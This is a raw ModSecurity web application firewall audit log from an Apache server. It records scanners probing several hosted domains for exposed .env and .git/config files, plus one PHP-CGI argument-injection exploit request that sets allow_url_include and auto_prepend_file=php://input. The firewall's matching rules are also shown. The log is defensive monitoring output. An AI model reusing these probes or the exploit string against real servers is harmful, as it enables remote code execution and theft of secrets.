"aIImIjzwUUVu1Y0WeVTrIgAAAAg"] Stopwatch: 1753359906514776 5143 (- - -) Stopwatch2: 1753359906514776 5143; combined=2768, p1=583, p2=2101, p3=0, p4=0, p5=84, sr=167, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.10 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --53c6d95d-Z-- --5f366b1b-A-- [24/Jul/2025:15:32:37.208514 +0300] aIIn5YTiRAaWRFFxa-VpoQAAAMY 213.136.84.241 52994 127.0.0.1 7081 --5f366b1b-B-- GET /.git/config HTTP/1.0 Host: mail.jinansystem.com X-Real-IP: 213.136.84.241 X-Accel-Internal: /internal-nginx-static-location Connection: close User-Agent: Mozilla/5.0 (CentOS; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36 Accept-Charset: utf-8 Accept-Encoding: gzip --5f366b1b-F-- HTTP/1.1 404 Not Found Content-Length: 267 Connection: close Content-Type: text/html; charset=iso-8859-1 --5f366b1b-H-- Message: Warning. Matched phrase "/.git/" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 286] [level 3] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "mail.jinansystem.com"] [uri "/.git/config"] [unique_id "aIIn5YTiRAaWRFFxa-VpoQAAAMY"] Stopwatch: 1753360357203594 5015 (- - -) Stopwatch2: 1753360357203594 5015; combined=2934, p1=610, p2=2181, p3=26, p4=38, p5=79, sr=180, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.10 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --5f366b1b-Z-- --a377ee00-A-- [24/Jul/2025:15:38:37.311302 +0300] aIIpTTzwUUVu1Y0WeVT3fwAAABc 197.238.33.65 57336 127.0.0.1 7081 --a377ee00-B-- GET /.env HTTP/1.0 Host: erp.jac.group X-Real-IP: 197.238.33.65 X-Forwarded-For: 222.132.252.204 X-Accel-Internal: /internal-nginx-static-location Connection: close User-Agent: Twitterbot/1.0 Accept: text/plain, text/html, application/json, */* Accept-Language: en-US,en;q=0.9 Accept-Encoding: gzip, deflate Cache-Control: no-cache Pragma: no-cache X-Originating-IP: 127.0.0.1 X-Remote-IP: 127.0.0.1 X-Client-IP: 127.0.0.1 --a377ee00-F-- HTTP/1.1 404 Not Found X-Powered-By: PHP/8.1.33 Set-Cookie: csrf_cookie_name=3863f3eafec8f33c8eeee9a854576229; expires=Thu, 24-Jul-2025 13:39:37 GMT; Max-Age=3660; path=/; HttpOnly; SameSite=Lax Upgrade: h2,h2c Connection: Upgrade, close Content-Type: text/html; charset=UTF-8 --a377ee00-H-- Message: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 286] [level 3] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "erp.jac.group"] [uri "/.env"] [unique_id "aIIpTTzwUUVu1Y0WeVT3fwAAABc"] Apache-Handler: proxy:unix:/var/www/vhosts/system/erp.jac.group/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1753360717243678 67735 (- - -) Stopwatch2: 1753360717243678 67735; combined=2941, p1=535, p2=2292, p3=0, p4=0, p5=113, sr=177, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.10 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --a377ee00-Z-- --d0c23a63-A-- [24/Jul/2025:15:38:37.311793 +0300] aIIpTYTiRAaWRFFxa-VuzgAAAMg 197.238.33.65 57326 127.0.0.1 7081 --d0c23a63-B-- GET /.env.production HTTP/1.0 Host: erp.jac.group X-Real-IP: 197.238.33.65 X-Forwarded-For: 236.6.172.60 X-Accel-Internal: /internal-nginx-static-location Connection: close User-Agent: Slackbot-LinkExpanding 1.0 Accept: text/plain, text/html, application/json, */* Accept-Language: en-US,en;q=0.9 Accept-Encoding: gzip, deflate Cache-Control: no-cache Pragma: no-cache X-Originating-IP: 127.0.0.1 X-Remote-IP: 127.0.0.1 X-Client-IP: 127.0.0.1 --d0c23a63-F-- HTTP/1.1 404 Not Found X-Powered-By: PHP/8.1.33 Set-Cookie: csrf_cookie_name=eb2faacea4b820492e912fbf543ee7d2; expires=Thu, 24-Jul-2025 13:39:37 GMT; Max-Age=3660; path=/; HttpOnly; SameSite=Lax Upgrade: h2,h2c Connection: Upgrade, close Content-Type: text/html; charset=UTF-8 --d0c23a63-H-- Message: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 286] [level 3] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "erp.jac.group"] [uri "/.env.production"] [unique_id "aIIpTYTiRAaWRFFxa-VuzgAAAMg"] Apache-Handler: proxy:unix:/var/www/vhosts/system/erp.jac.group/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1753360717238985 72986 (- - -) Stopwatch2: 1753360717238985 72986; combined=3229, p1=614, p2=2469, p3=0, p4=0, p5=145, sr=182, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.10 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --d0c23a63-Z-- --056dde4f-A-- [24/Jul/2025:15:38:37.432778 +0300] aIIpTYTiRAaWRFFxa-Vu0AAAAME 197.238.33.65 57368 127.0.0.1 7081 --056dde4f-B-- GET /.env.local HTTP/1.0 Host: erp.jac.group X-Real-IP: 197.238.33.65 X-Forwarded-For: 68.31.165.100 X-Accel-Internal: /internal-nginx-static-location Connection: close User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 Accept: text/plain, text/html, application/json, */* Accept-Language: en-US,en;q=0.9 Accept-Encoding: gzip, deflate Cache-Control: no-cache Pragma: no-cache X-Originating-IP: 127.0.0.1 X-Remote-IP: 127.0.0.1 X-Client-IP: 127.0.0.1 --056dde4f-F-- HTTP/1.1 404 Not Found X-Powered-By: PHP/8.1.33 Set-Cookie: csrf_cookie_name=bafbcbd67163955295cf5f492d23a0c7; expires=Thu, 24-Jul-2025 13:39:37 GMT; Max-Age=3660; path=/; HttpOnly; SameSite=Lax Upgrade: h2,h2c Connection: Upgrade, close Content-Type: text/html; charset=UTF-8 --056dde4f-H-- Message: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 286] [level 3] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "erp.jac.group"] [uri "/.env.local"] [unique_id "aIIpTYTiRAaWRFFxa-Vu0AAAAME"] Apache-Handler: proxy:unix:/var/www/vhosts/system/erp.jac.group/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1753360717388726 44256 (- - -) Stopwatch2: 1753360717388726 44256; combined=3619, p1=497, p2=2944, p3=0, p4=0, p5=177, sr=134, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.10 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --056dde4f-Z-- --4c15c57f-A-- [24/Jul/2025:15:38:37.448007 +0300] aIIpTTzwUUVu1Y0WeVT3gAAAABY 197.238.33.65 57376 127.0.0.1 7081 --4c15c57f-B-- GET /.env.prod HTTP/1.0 Host: erp.jac.group X-Real-IP: 197.238.33.65 X-Forwarded-For: 222.154.84.30 X-Accel-Internal: /internal-nginx-static-location Connection: close User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 Accept: text/plain, text/html, application/json, */* Accept-Language: en-US,en;q=0.9 Accept-Encoding: gzip, deflate Cache-Control: no-cache Pragma: no-cache X-Originating-IP: 127.0.0.1 X-Remote-IP: 127.0.0.1 X-Client-IP: 127.0.0.1 --4c15c57f-F-- HTTP/1.1 404 Not Found X-Powered-By: PHP/8.1.33 Set-Cookie: csrf_cookie_name=bf9e0f7468a99283b0751329d728f821; expires=Thu, 24-Jul-2025 13:39:37 GMT; Max-Age=3660; path=/; HttpOnly; SameSite=Lax Upgrade: h2,h2c Connection: Upgrade, close Content-Type: text/html; charset=UTF-8 --4c15c57f-H-- Message: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 286] [level 3] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "erp.jac.group"] [uri "/.env.prod"] [unique_id "aIIpTTzwUUVu1Y0WeVT3gAAAABY"] Apache-Handler: proxy:unix:/var/www/vhosts/system/erp.jac.group/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1753360717397399 50763 (- - -) Stopwatch2: 1753360717397399 50763; combined=2928, p1=519, p2=2227, p3=0, p4=0, p5=181, sr=151, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.10 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --4c15c57f-Z-- --5bfbab08-A-- [24/Jul/2025:15:38:37.559727 +0300] aIIpTYTiRAaWRFFxa-Vu0gAAAM0 197.238.33.65 57382 127.0.0.1 7081 --5bfbab08-B-- GET /api/.env HTTP/1.0 Host: erp.jac.group X-Real-IP: 197.238.33.65 X-Forwarded-For: 237.27.65.79 X-Accel-Internal: /internal-nginx-static-location Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 Accept: text/plain, text/html, application/json, */* Accept-Language: en-US,en;q=0.9 Accept-Encoding: gzip, deflate Cache-Control: no-cache Pragma: no-cache X-Originating-IP: 127.0.0.1 X-Remote-IP: 127.0.0.1 X-Client-IP: 127.0.0.1 --5bfbab08-F-- HTTP/1.1 404 Not Found X-Powered-By: PHP/8.1.33 Set-Cookie: csrf_cookie_name=0e6eebefa6956404c1c67e39b8f72ed2; expires=Thu, 24-Jul-2025 13:39:37 GMT; Max-Age=3660; path=/; HttpOnly; SameSite=Lax Upgrade: h2,h2c Connection: Upgrade, close Content-Type: text/html; charset=UTF-8 --5bfbab08-H-- Message: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 286] [level 3] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "erp.jac.group"] [uri "/api/.env"] [unique_id "aIIpTYTiRAaWRFFxa-Vu0gAAAM0"] Apache-Handler: proxy:unix:/var/www/vhosts/system/erp.jac.group/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1753360717513176 46681 (- - -) Stopwatch2: 1753360717513176 46681; combined=3306, p1=683, p2=2480, p3=0, p4=0, p5=143, sr=186, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.10 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --5bfbab08-Z-- --f93cad15-A-- [24/Jul/2025:15:41:49.923678 +0300] aIIqDV_Slk4spUNHawAnIwAAAFU 91.167.178.105 51694 127.0.0.1 7080 --f93cad15-B-- GET /.env HTTP/1.0 Host: 41.128.143.86 X-Real-IP: 91.167.178.105 Connection: close User-agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36 Accept-Encoding: gzip, deflate, identity Accept: */* --f93cad15-F-- HTTP/1.1 404 Not Found Content-Length: 259 Connection: close Content-Type: text/html; charset=iso-8859-1 --f93cad15-H-- Message: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 286] [level 3] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "41.128.143.86"] [uri "/.env"] [unique_id "aIIqDV_Slk4spUNHawAnIwAAAFU"] Stopwatch: 1753360909917994 5876 (- - -) Stopwatch2: 1753360909917994 5876; combined=3842, p1=753, p2=2895, p3=25, p4=37, p5=132, sr=185, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.10 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --f93cad15-Z-- --4a418d05-A-- [24/Jul/2025:15:41:58.328013 +0300] aIIqFoTiRAaWRFFxa-VzAQAAAMQ 91.167.178.105 56994 127.0.0.1 7080 --4a418d05-B-- GET /sendgrid/.env HTTP/1.0 Host: 41.128.143.86 X-Real-IP: 91.167.178.105 Connection: close User-agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36 Accept-Encoding: gzip, deflate, identity Accept: */* --4a418d05-F-- HTTP/1.1 404 Not Found Content-Length: 259 Connection: close Content-Type: text/html; charset=iso-8859-1 --4a418d05-H-- Message: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 286] [level 3] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "41.128.143.86"] [uri "/sendgrid/.env"] [unique_id "aIIqFoTiRAaWRFFxa-VzAQAAAMQ"] Stopwatch: 1753360918323633 4451 (- - -) Stopwatch2: 1753360918323633 4451; combined=2940, p1=557, p2=2238, p3=22, p4=47, p5=76, sr=170, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.10 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --4a418d05-Z-- --9c241c0a-A-- [24/Jul/2025:15:47:58.916007 +0300] aIIrfl_Slk4spUNHawAomwAAAFA 198.55.98.253 41952 127.0.0.1 7081 --9c241c0a-B-- GET /.git/config HTTP/1.0 Host: demonanomie.com X-Real-IP: 198.55.98.253 X-Accel-Internal: /internal-nginx-static-location Connection: close User-Agent: Links (2.3pre1; Linux 2.6.38-8-generic x86_64; 170x48) Accept-Charset: utf-8 Accept-Encoding: gzip --9c241c0a-F-- HTTP/1.1 404 Not Found Upgrade: h2,h2c Connection: Upgrade, close Last-Modified: Mon, 09 Jun 2025 14:06:48 GMT ETag: "328-637241743cede" Accept-Ranges: bytes Content-Length: 808 Content-Type: text/html --9c241c0a-H-- Message: Warning. Matched phrase "/.git/" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 286] [level 3] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "demonanomie.com"] [uri "/.git/config"] [unique_id "aIIrfl_Slk4spUNHawAomwAAAFA"] Stopwatch: 1753361278910931 5190 (- - -) Stopwatch2: 1753361278910931 5190; combined=2976, p1=656, p2=2236, p3=0, p4=0, p5=83, sr=172, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.10 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --9c241c0a-Z-- --b06b251f-A-- [24/Jul/2025:15:54:42.933297 +0300] aIItEvFbyHsjieS2RGB4eAAAAMY 93.123.109.64 55736 127.0.0.1 7081 --b06b251f-B-- GET /.git/config HTTP/1.0 Host: train.jac.group X-Real-IP: 93.123.109.64 X-Accel-Internal: /internal-nginx-static-location Connection: close User-Agent: Opera/9.80 (Linux i686; Opera Mobi/1040; U; en) Presto/2.5.24 Version/10.00 Accept-Charset: utf-8 Accept-Encoding: gzip --b06b251f-F-- HTTP/1.1 404 Not Found Upgrade: h2,h2c Connection: Upgrade, close Last-Modified: Tue, 24 May 2022 15:05:06 GMT ETag: "328-5dfc34833fcce" Accept-Ranges: bytes Content-Length: 808 Content-Type: text/html --b06b251f-H-- Message: Warning. Matched phrase "/.git/" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 286] [level 3] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "train.jac.group"] [uri "/.git/config"] [unique_id "aIItEvFbyHsjieS2RGB4eAAAAMY"] Stopwatch: 1753361682928032 5429 (- - -) Stopwatch2: 1753361682928032 5429; combined=3099, p1=667, p2=2263, p3=0, p4=0, p5=169, sr=218, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.10 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --b06b251f-Z-- --c135e023-A-- [24/Jul/2025:15:54:44.456550 +0300] aIItFPFbyHsjieS2RGB4fgAAAMo 206.189.95.232 55814 127.0.0.1 7081 --c135e023-B-- POST /php-cgi/php-cgi.exe?%ADd+cgi.force_redirect%3D0+%ADd+disable_functions%3D""+%ADd+allow_url_include%3D1+%ADd+auto_prepend_file%3Dphp://input HTTP/1.0 Host: train.jac.group X-Real-IP: 206.189.95.232 X-Accel-Internal: /internal-nginx-static-location Connection: close Content-Length: 164 User-Agent: Go-http-client/1.1 Content-Type: application/x-www-form-urlencoded Accept-Encoding: gzip --c135e023-F-- HTTP/1.1 404 Not Found Upgrade: h2,h2c Connection: Upgrade, close Last-Modified: Tue, 24 May 2022 15:05:06 GMT ETag: "328-5dfc34833fcce" Accept-Ranges: bytes Content-Length: 808 Content-Type: text/html --c135e023-H-- Message: Warning. Pattern match "(?i)php://(std(in|out|err)|(in|out)put|fd|memory|temp|filter)" at ARGS_NAMES:\xadd cgi.force_redirect=0 \xadd disable_functions="" \xadd allow_url_include=1 \xadd auto_prepend_file=php://input. [file "/etc/apache2/modsecurity.d/rules/comodo_free/21_PHP_PHPGen.conf"] [line "22"] [id "218420"] [rev "2"] [msg "COMODO WAF: PHP Injection Attack: I/O Stream Found||train.jac.group|F|2"] [data "Matched Data: php://input found within ARGS_NAMES:\x5cxadd cgi.force_redirect=0 \x5cxadd disable_functions=\x22\x22 \x5cxadd allow_url_include=1 \x5cxadd auto_prepend_file=php://input: \xadd cgi.force_redirect=0 \xadd disable_functions=\x22\x22 \xadd allow_url_include=1 \xadd auto_prepend_file=php://input"] [severity "CRITICAL"] [tag "CWAF"] [tag "PHPGen"] Apache-Error: [file "apache2_util.c"] [line 286] [level 3] ModSecurity: Warning. Pattern match "(?i)php://(std(in|out|err)|(in|out)put|fd|memory|temp|filter)" at ARGS_NAMES:\\\\xadd cgi.force_redirect=0 \\\\xadd disable_functions="" \\\\xadd allow_url_include=1 \\\\xadd auto_prepend_file=php://input. [file "/etc/apache2/modsecurity.d/rules/comodo_free/21_PHP_PHPGen.conf"] [line "22"] [id "218420"] [rev "2"] [msg "COMODO WAF: PHP Injection Attack: I/O Stream Found||train.jac.group|F|2"] [data "Matched Data: php://input found within ARGS_NAMES:\\\\x5cxadd cgi.force_redirect=0 \\\\x5cxadd disable_functions=\\\\x22\\\\x22 \\\\x5cxadd allow_url_include=1 \\\\x5cxadd auto_prepend_file=php://input: \\\\xadd cgi.force_redirect=0 \\\\xadd disable_functions=\\\\x22\\\\x22 \\\\xadd allow_url_include=1 \\\\xadd auto_prepend_file=php://input"] [severity "CRITICAL"] [tag "CWAF"] [tag "PHPGen"] [hostname "train.jac.group"] [uri "/php-cgi/php-cgi.exe"] [unique_id "aIItFPFbyHsjieS2RGB4fgAAAMo"] Stopwatch: 1753361684449444 7194 (- - -) Stopwatch2: 1753361684449444 7194; combined=5230, p1=512, p2=4588, p3=0, p4=0, p5=129, sr=138, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.10 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --c135e023-Z-- --74b6f122-A-- [24/Jul/2025:15:54:54.506848 +0300] aIItHvFbyHsjieS2RGB4pAAAAMQ 206.189.95.232 51536 127.0.0.1 7081 --74b6f122-B-- GET /.env HTTP/1.0 Host: train.jac.group X-Real-IP: 206.189.95.232 X-Accel-Internal: /internal-nginx-static-location Connection: close User-Agent: Go-http-client/1.1 Accept-Encoding: gzip --74b6f122-F-- HTTP/1.1 404 Not Found Upgrade: h2,h2c Connection: Upgrade, close Last-Modified: Tue, 24 May 2022 15:05:06 GMT ETag: "328-5dfc34833fcce" Accept-Ranges: bytes Content-Length: 808 Content-Type: text/html --74b6f122-H-- Message: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 286] [level 3] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "train.jac.group"] [uri "/.env"] [unique_id "aIItHvFbyHsjieS2RGB4pAAAAMQ"] Stopwatch: 1753361694502031 4886 (- - -) Stopwatch2: 1753361694502031 4886; combined=2758, p1=662, p2=2021, p3=0, p4=0, p5=75, sr=169, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.10 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --74b6f122-Z-- --d08a1b13-A-- [24/Jul/2025:15:54:55.363165 +0300] aIItH0Q7UIwkHXYqnpxiewAAABU 206.189.95.232 51556 127.0.0.1 7081 --d08a1b13-B-- GET /.git/config HTTP/1.0 Host: train.jac.group X-Real-IP: 206.189.95.232 X-Accel-Internal: /internal-nginx-static-location Connection: close User-Agent: Go-http-client/1.1 Accept-Encoding: gzip --d08a1b13-F-- HTTP/1.1 404 Not Found Upgrade: h2,h2c Connection: Upgrade, close Last-Modified: Tue, 24 May 2022 15:05:06 GMT ETag: "328-5dfc34833fcce" Accept-Ranges: bytes Content-Length: 808 Content-Type: text/html --d08a1b13-H-- Message: Warning. Matched phrase "/.git/" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 286] [level 3] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "train.jac.group"] [uri "/.git/config"] [unique_id "aIItH0Q7UIwkHXYqnpxiewAAABU"] Stopwatch: 1753361695357967 5329 (- - -) Stopwatch2: 1753361695357967 5329; combined=3126, p1=697, p2=2297, p3=0, p4=0, p5=132, sr=178, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.10 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --d08a1b13-Z-- --08032354-A-- [24/Jul/2025:16:01:02.951561 +0300] aIIujvFbyHsjieS2RGCApgAAAME 198.55.98.216 34688 127.0.0.1 7081 --08032354-B-- GET /.git/config HTTP/1.0 Host: college.jinansystem.com X-Real-IP: 198.55.98.216 X-Accel-Internal: /internal-nginx-static-location Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; ARM; Lumia 950 Dual SIM) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.79 Safari/537.36 Edge/14.14393 Accept-Charset: utf-8 Accept-Encoding: gzip --08032354-F-- HTTP/1.1 404 Not Found Upgrade: h2,h2c Connection: Upgrade, close Last-Modified: Wed, 23 Jul 2014 14:20:24 GMT ETag: "3bf-4fedd0a7c7a00" Accept-Ranges: bytes Content-Length: 959 Content-Type: text/html --08032354-H-- Message: Warning. Matched phrase "/.git/" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 286] [level 3] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "college.jinansystem.com"] [uri "/.git/config"] [unique_id "aIIujvFbyHsjieS2RGCApgAAAME"] Stopwatch: 1753362062947035 4647 (- - -) Stopwatch2: 1753362062947035 4647; combined=2740, p1=459, p2=2187, p3=0, p4=0, p5=94, sr=128, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.10 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --08032354-Z-- --470fda34-A-- [24/Jul/2025:16:03:30.840052 +0300] aIIvIvFbyHsjieS2RGCFJAAAAMk 43.134.59.40 41880 127.0.0.1 7081 --470fda34-B-- GET /.env HTTP/1.0 Host: www.hamomohsen.net X-Real-IP: 43.134.59.40 X-Accel-Internal: /internal-nginx-static-location Connection: close --470fda34-F-- HTTP/1.1 404 Not Found X-Powered-By: PHP/8.3.23 Cache-Control: no-cache, private pragma: no-cache expires: -1 Upgrade: h2,h2c Connection: Upgrade, close Content-Type: text/html; charset=UTF-8 --470fda34-H-- Message: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 286] [level 3] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "www.hamomohsen.net"] [uri "/.env"] [unique_id "aIIvIvFbyHsjieS2RGCFJAAAAMk"] Apache-Error: [file "mod_proxy_fcgi.c"] [line 896] [level 3] AH01071: Got error 'PHP message: PHP Warning: PHP Request Startup: open_basedir restriction in effect. File(/var/cpanel/php/sessions/ea-php82) is not within the allowed path(s): (/var/www/vhosts/hamomohsen.net/:/tmp/) in Unknown on line 0' Apache-Handler: proxy:unix:/var/www/vhosts/system/hamomohsen.net/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1753362210585105 255025 (- - -) Stopwatch2: 1753362210585105 255025; combined=2867, 